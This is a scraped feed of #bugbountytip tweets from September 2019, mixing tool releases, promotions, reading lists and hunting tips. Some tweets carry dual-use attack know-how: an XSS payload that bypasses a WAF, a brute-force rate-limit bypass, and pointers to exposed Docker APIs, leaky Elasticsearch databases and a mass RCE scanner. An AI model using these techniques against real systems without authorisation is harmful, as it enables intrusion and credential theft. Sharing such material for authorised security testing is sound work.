0 @amazon I know you people have private bug bounty where you guys pay well.. Why dont you do the same in public too.. We too deserve a token of appreciation... #BugBounty #bugbountytips #BugBountyTip #bugbountytip https://t.co/Oj7fjHaCNJ
Ashish Kunwar
@D0rkerDevil


2019-09-30 10:34:35
3 #bugbountytip do UDP scan and if you found port 500 then run ike-probe to see if its vulnerable to Shared Secret Hash Leakage Weakness, then it will be easily exploitable. ;) #bugbounty #security
Arif Emre Demir
@onerror_xss


2019-09-30 10:32:44
0 Best xss cheatsheet in the world. Thx @Burp_Suite <3 https://t.co/emSf0IMzLa #bugbounty #bugbountytip #xss
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:52:16
0 Give your Career A Boost with 🏆🏆 C|EH Certification 🏆🏆 Join HackDoor for Getting C|EH Certified Today !! 💰💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/QiL5AGygD8
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:50:13
0 Bug Hunter ToolKit 💰💰 Comment If Your Favourite Tool is Missing ! 💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/EBE0h6JiEB
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:48:13
0 HIT LIKE IF U AGREE !!!! #WindowsUpdate Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/Lrp1bwXLIV
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:46:40
0 BUG HUNTER$ 💰💰💰💰💰 HIT LIKE IF U AGREE !!!! Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/rIOXTReuFD
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:45:01
1 BUG HUNTER$ 💰💰💰💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/yk9LKNVjtc
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:42:37
1 Best Search Engine For BUG HUNTER$ Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/DLFN6OzI84
hyperdummy
@dummyclout


2019-09-30 02:03:02
0 #bugbountytip: sometimes you can use the sanitizer’s behavior to get around a waf - sanitizer removes anything like <this> - waf blacklists anything like onerror/alert solution: on<x>error=al<x>ert(1) gets past the waf and the sanitizer returns onerror=alert(1)
SaN Th✪sH
@Madrobot_


2019-09-29 20:45:20
1 I just published My recon Automation #bugbountytip #bugbounty #hackerone #recon #tools #bugcrowd @Hacker0x01 @Bugcrowd https://t.co/yX1eputSKj
ghostlulz
@ghostlulz1337


2019-09-29 19:06:47
4 So you think getting RCE is hard and just for those uber l33t hackers, its not, just look for exposed Docker APIs. Easy wins. More information on my blog: https://t.co/NUnZhChfJt #infosec #bugbountytips #pentest #redteam #docker #bugbountytip #BugBounty https://t.co/TJKcHswxoo
sagar yadav
@sagaryadav8742


2019-09-29 18:09:35
0 Finally month end with a small bounty 😄 Happy to #secure https://t.co/tVIlKKSeoq #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 #swag https://t.co/ZgCtVXfiMT
ghostlulz
@ghostlulz1337


2019-09-29 17:55:09
1 Some of my favorite things to look for in bug bounties are misconfigurations. A simple setting/config change can reck an entire company. You can apply a patch to fix a CVE but for misconfigurations there generally is no patch to fix it. #bugbountytips #bugbountytip #infosec
Nikos Gkogkos
@ngkogkos


2019-09-29 16:48:10
0 Love the feeling of @albinowax's Turbo Intruder when brute-forcing endpoints. First I run small fuzzing, then I customise the python code for more granular fuzzing. If you are not using it, you are missing. #bugbountytip #BugBounty https://t.co/TNax1ftAYF
baluz🔥
@haknfuk


2019-09-29 13:41:46
0 This was sick..........ey u suckers.. I got an really weird idor ........in googles product writeup coming soon .............................! #bugbounty #bugbountytip #googlevrp #vrp
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-29 07:32:25
0 Give your Career A Boost with 🏆🏆 C|EH Certification 🏆🏆 Join HackDoor for Getting C|EH Certified Today !! 💰💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/bGmyRodDCR
Eduard Tolosa
@Edu4rdSHL


2019-09-29 02:32:54
3 Tool for subdomains monitoring of your #BugBounty or #pentesting targets? Findomain 0.4.0 is out! Now Findomain can tell you where is a new subdomain for a specific target or a list of targets. See https://t.co/T18VChCGrT #bugbountytip #monitoring #subdomains #hacking #OSINT
Anonymous Worldwide
@AnonsWorldwide


2019-09-29 01:13:05
8 As it gets harder economically to get by for most of us you can make an income if you are into technology. Register these bounty programs to report a bug. These top 30 #BugBounty programs are definitely worth checking out: https://t.co/TGVOzUAMLX #Hacknews #bugbountytip https://t.co/mga4ebFVlj
Berk Bulan
@berk_bulan


2019-09-29 00:08:29
0 Best Practice Labs ------------------------------ BWAPP Webgoat Rootme OWASP Juicy Shop Hacker101 Hacksplaining Penetration Testing Practice Labs Damn Vulnerable iOS App (DVIA) Mutillidae Trytohack HackTheBox SQL Injection Practice #BugBounty #bugbountytips #bugbountytip
Berk Bulan
@berk_bulan


2019-09-29 00:04:16
2 Some Books for reading about Bug Hunting 1) The web application hackers handbook finding and exploiting security flaws -ed2 2011 2) OTGv4 3) Web Hacking 101 4) Breaking into infosec #BugBounty #bugbountytips #bugbountytip
Berk Bulan
@berk_bulan


2019-09-28 23:57:56
0 Good resource for beginner bug bounty hunters ;) #bugbountytips #bugbountytip #BugBounty https://t.co/giIArFJMZ6
baluz🔥
@haknfuk


2019-09-28 11:53:11
1 Some useful twitter Dorks...! #bugbountytip csrf - returns all tweets that include csrf term #bugbounty swag - returns all programs that gives swag #bugbountytips ssrf - returns all tweets regarding ssrf #bugbountytip graph api - returns all about garap…https://t.co/fdiaE2eJtv
Sanketh Sharath
@sharathsanketh


2019-09-28 10:49:20
0 From knowing absolutely nothing in web hacking to my 1st bounty this month, the journey has been arduous yet exciting! https://t.co/X5ed6r0dIR #bugbounty #bugbountytips #bugbountytip
A hacker's life
@Unknownuser1806


2019-09-28 02:35:31
1 Resources-for-Beginner-Bug-Bounty-Hunters https://t.co/GvowSG82JJ #bugbounty,#hacking,#bugbountytip
Dwiki Kusuma
@malexplore


2019-09-27 23:35:51
0 Don't get me wrong, I just want to be polite 😂 #bugbountytips #bugbountytip #synack https://t.co/QKFrSrOtvG
mahendra purbia
@mahendrapurbia7


2019-09-27 20:09:00
1 🔰HOF🔰 & appreciation letter given by https://t.co/yeySsQb8h5 Happy to secure. #bugbountytip #bugbounty #bugbcrowd #openbugbounty #cybersecurity https://t.co/rm20i8LPak
bugbountytip
@a_l_e_r_t_1_


2019-09-27 14:57:24
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Λявєη
@spenkkkkk


2019-09-27 12:39:03
0 curl https://t.co/ptThqLAUu1 --silent | grep Disallow | awk '{print $2}' #bugbountytip #oneliner
Çlirim Emini
@0xcela


2019-09-27 11:44:57
0 import time #bugbountytip #bugbountytips
Milind Purswani
@MilindPurswani


2019-09-27 07:01:44
0 Never ever ever ever ever do recon without tmux. Trust me, its a life saver. #bugbountytip
baluz
@haknfuk


2019-09-27 03:47:10
0 If your struggling with exploiting xss and bypassing filters..... Remember he is there @spyerror #bugbountytip
ghostlulz
@ghostlulz1337


2019-09-27 02:48:33
2 Yet another Elastic search database with thousands of clear text credentials. If your not looking for these on your bug bounties your missing out on easy wins. More info on my blog https://t.co/kqwIe5WNwy #BugBounty #BugBountyTip #infosec #elasticsearch #redteam #bugbountytips https://t.co/1FrEIz8kHp
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-26 21:17:34
0 @teamsnap Reported Vulnerability under your Responsible Disclosure Program - You fixed vulnerability without any acknowledgement or reward !! A good lesson for all #BugHunters ! #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-09-26 19:02:52
0 Less than 1$💪👉https://t.co/JPaA4CsKRe #BugBountyTip #xss #xxe #sqli #ssrf #ce
bugbountymemes
@bugbounty_memes


2019-09-26 17:16:19
1 i was rewarded 4 times $1,000 bounty -> Bypass 429. 1. found expired domain. 2. found login form with 429 protection after some attempts. 3. replace the domain with expired domain. 4. start bruteforce. Now you don't have 429 too many requests #bugbountytip #bugbounty
Muhab Alhadi
@MuhabAlhadi


2019-09-26 14:48:50
0 Burp suite is a beast, but Owasp ZAP does the job when you're Broke 😁 I really like it's Hidden directory feature, the Tool is solid #owaspZAP #bugbountytip
Un4gi
@Un4gi1


2019-09-26 13:25:27
0 Apparently uploading an malicious executable file or pdf, etc. is a “feature”. No support employee would ever open an attachment without heavy social engineering.. 🙄 I‘m starting to hate @Hacker0x01 managed programs more and more every day... #bugbountytip https://t.co/PslGB8W1Ad
Henry Chen
@chybeta


2019-09-26 11:25:54
1 my personal monitor system alerts me to update Jenkins,Joomla,Spring and Jira Jenkins: https://t.co/3QLlyzxZcb Joomla: https://t.co/PHiJqZqEgr Spring: https://t.co/1QePyPw7DF Jira: https://t.co/hTyIUVC9yC #bugbounty #bugbountytip #bugbountytips https://t.co/u9gxcgC2vh
intigriti
@intigriti


2019-09-26 11:11:37
10 Testing a Ruby on Rails app? Add .json to the URL and see what happens! 😏 Thanks for the #BugBountyTip, @yaworsk! 🙌 https://t.co/oHlHilQtr7
bugbountytip
@a_l_e_r_t_1_


2019-09-26 08:49:02
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Matt Palmer
@mattpalmer_au


2019-09-26 08:29:07
0 When doing masses amount of recon on a program with a large scope, how does everyone keep motivated? #bugbountytip #bugbountytips
A hacker's life
@Unknownuser1806


2019-09-26 08:12:14
1 This tool simply iterates over hosts on port 443 and 80 and runs a PoC to test if they are vulnerable to RCE. You can use Shodan to gather potential targets: https://t.co/svK0gwpuRk #bugbounty, #bugbountytip, #hacking
Somdev Sangwan
@s0md3v


2019-09-26 05:52:22
0 This tweet didn't get enough reach, should I add #bugbountytip?
Sandeep Kamble
@SandeepL337


2019-09-26 04:36:41
0 Hey H4x0r, create as many as possible accounts. Try to hijack other accounts using bruteforce, automated bots or any vulnerabilities. https://t.co/Zk48BocHuE Enjoy !!! DM me results and get the cool swag from @SecureLayer7. #bugbounty #bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-09-26 03:28:31
6 Findomain 0.3.0 is out! * Added support to work only with resolved subdomains. * Added support for writing to custom output unique file (still when reading domains from file). * A lot of code improvements. https://t.co/qay2bKyJ5K #bugbounty #subdomains #bugbountytip #tools
FS
@fsec__


2019-09-26 02:51:41
0 Bug bounty bazaar and contest! https://t.co/AYxkrwAoXK https://t.co/9eeeKg3lm9 #BugBounty #bugbountytip #bugbountytips
ak1t4 🇦🇷
@akita_zen


2019-09-25 23:31:48
0 @hakluke @TomNomNom #bugbountytip: For a quick vim exit, use nano.
A hacker's life
@Unknownuser1806


2019-09-25 22:34:44
0 Using URI to pop shells via the Discord Client https://t.co/xtT8DuW0ei #bugbountytip ,#bugbounty ,#hacking
bugbountytip
@a_l_e_r_t_1_


2019-09-25 21:47:44
0 Less than 1$ no ads ❌💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Security Executions Code
@pwn0sec


2019-09-25 20:01:08
0 Find (XSS) Vulnerabilities with (𝐗𝐒𝐒)-𝐋𝐚𝐛𝐬 [Tutorial] https://t.co/IfpKUm1Azs #bugbounty #bugbountytip #bugbountytips #xss
Andri Wahyudi 🕊️ ‏
@andripwn


2019-09-25 18:36:42
0 Web App Penetration Testing - Recon Part #6 https://t.co/bPJkQbIgDZ #BugBounty #bugbountytips #bugbountytip #hackerone
m0z
@LooseSecurity


2019-09-25 17:44:02
2 The secret to a good bug bounty career is approaching payment like you would luck. If you get it, you're happy, if not then that's just how life is. There is no point complaining, pay it forward and being a nice guy will pay off in the end. #BugBounty #bugbountytips #bugbountytip
Fisher
@Regala_


2019-09-25 17:25:04
0 Valid within and outside bb, never hole yourself up in your own opinion bubble 🙏 #bugbountytip https://t.co/MFeVw0xllI
bugbountytip
@a_l_e_r_t_1_


2019-09-25 15:00:50
0 Less than 1$ no ads ❌💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Bugploit
@bugploit


2019-09-25 08:10:23
0 Bad luck again 🙃! #bugbounty #bugbountytip #bugbountytip https://t.co/nyCKPRRlwL
expl0itc0der
@vanshitmalhotra


2019-09-25 05:59:13
0 Abusing VPC Traffic Mirroring in AWS : Deploying a Malicious Mirror with Compromised AWS Credentials : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/7oTKO87uT4
expl0itc0der
@vanshitmalhotra


2019-09-25 05:55:16
1 pure bash bible : A collection of pure bash alternatives to external processes : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/WFrwiofDPJ
expl0itc0der
@vanshitmalhotra


2019-09-25 05:53:43
0 navi : An interactive cheatsheet tool for the command-line : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/wW8DAqxakm
expl0itc0der
@vanshitmalhotra


2019-09-25 05:52:28
0 gitGraber : Monitor GitHub to search and find sensitive data in real time for different online services such as: Google, Amazon, Paypal, Mailgun, Facebook, Twitter, Heroku, Stripe : #BugBounty #BugBountyTip #penetrationtesting #pentesting #devsecops https://t.co/d3uSf6oV3X
expl0itc0der
@vanshitmalhotra


2019-09-25 05:48:20
0 [Bug Bounty] Exploiting Cookie Based XSS by Finding RCE #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/C6BWshUbE6
Yusuf Yazir
@Hacklad


2019-09-25 04:34:48
0 @moodiAbdoul Glad to hear that bud. Search on Twitter "#bugbountytip ato" or "#bugbountytip takeover" that's my #bugbountytip 💪 Do it ✔
Shubham Sharma
@Shubham_pen


2019-09-25 03:24:49
0 Banner grabbing is a process to collect details regarding any remote PC on a network and the services running on its open ports. @rajchandel @kalilinux @ubuntu @nmap #RedTeam #CyberSecurity #infosec #bugbountytip #Pentesting #CTF #OSCP #GodMorningWednesday https://t.co/bYuLQsIdMA
A hacker's life
@Unknownuser1806


2019-09-25 02:35:02
0 “The journey of Web Cache + Firewall Bypass to SSRF to AWS Credentials compromise!” by Avinash Jain (@logicbomb_1) https://t.co/dMNo89RrZN #bugbounty,#bugbountytip ,#hacking
ICO scams & etc
@Scams_Alarm


2019-09-24 21:17:17
0 #Telegram just launched a competition to fix it's #blockchain. #TON issues on GitHub are rising, no documentation🙈. After raising 1.5 billion$+ 💸 Contest 💎https://t.co/P1q9EigN7x $TON GitHub 💎https://t.co/cisSF9zhQk #bugcontest #bugbountytip #crypto #ico # https://t.co/CuPhJbjw8Z
A hacker's life
@Unknownuser1806


2019-09-24 19:56:17
0 “#BugBounty — ‘Journey from LFI to RCE!!!’-How” by Avinash Jain (@logicbomb_1) https://t.co/pnUI6Xmrdk #bugbountytip,#hacking,#programming
Murdockz
@Murdockz_CEH


2019-09-24 19:26:58
0 Finally wrote a script to git pull all my BB tools. Long overdue. check it out https://t.co/iv6PfCd2pN #bugbounty #bugbountytips #bugbountytip
Arif Khan
@payloadartist


2019-09-24 15:24:51
0 This is really something one should try out. It eases out your recon to a great extent. #bugbounty #infosec #bugbountytip https://t.co/iJxu1Y09hf
A hacker's life
@Unknownuser1806


2019-09-24 09:41:16
0 aquatone results for sites with bug bountys Raise an issue if you want a fresh scan or a new domain to be checked https://t.co/o2na3KQISM #bugbounty,#hacking,#bugbountytip
David Haigh
@BugDevilDavid


2019-09-24 08:56:20
0 There is a bug in iOS 13 where you can’t turn off HomePod alarms which is really weird @apple are you going to fix this? #homepod #tech #bug #bughead #softwaretesting #software #ios #ios13 #homekit #major #wtf #apple @theapplehub @AppleSupport #bugbountytip #testing https://t.co/6p8nvNrGI0
Vulkey_Chen
@Vulkey_Chen


2019-09-24 08:28:26
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/KmowGjUxcA
Rapid Safeguard
@RapidSafeguard


2019-09-24 05:34:25
0 https://t.co/XzCLxBUQXt Counter strike Global offensive that allows a remote attacker to execute remote code without the users permission. #CounterStrikeGlobalOffensive #infosec #vulnerability #Bugs #bugbountytip https://t.co/HmkCj1cKHs
bugbountytip
@a_l_e_r_t_1_


2019-09-24 04:39:10
0 Less than 1$ no ads ❌💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
𝙿𝚘𝚖𝚎𝚐𝚛𝚊𝚗𝚊𝚝𝚎 🌴
@ret2pomegranate


2019-09-24 02:28:53
0 Has anyone been paid by @ATT Bug Bounty Program? If so what is the expectancy waiting time till bounty or how long did it take to bounty & resolve? #BugBountyTip #infosec #ATT #bugbounty #hackerone
bugbountytip
@a_l_e_r_t_1_


2019-09-23 20:06:17
0 Just 1$ https://t.co/JPaA4CKmfO #bugbountytip #bugbounties
Abss
@abss_tbh


2019-09-23 17:54:04
0 Get your targets IP ranges using your targets domain (asn+cidr extract): a=$(curl -H'Accept: application/json' https://t.co/NGktlz9hSE$(dig +short $domain | head -1)| jq .as_number);echo '!gas'$a''| nc https://t.co/iLNKnnj93I 43 | tr " " "\n" | sed -e '1d' -e '$d' #BugBountyTip https://t.co/YzNOF6r1bD
Kenan
@h1_kenan


2019-09-23 14:47:07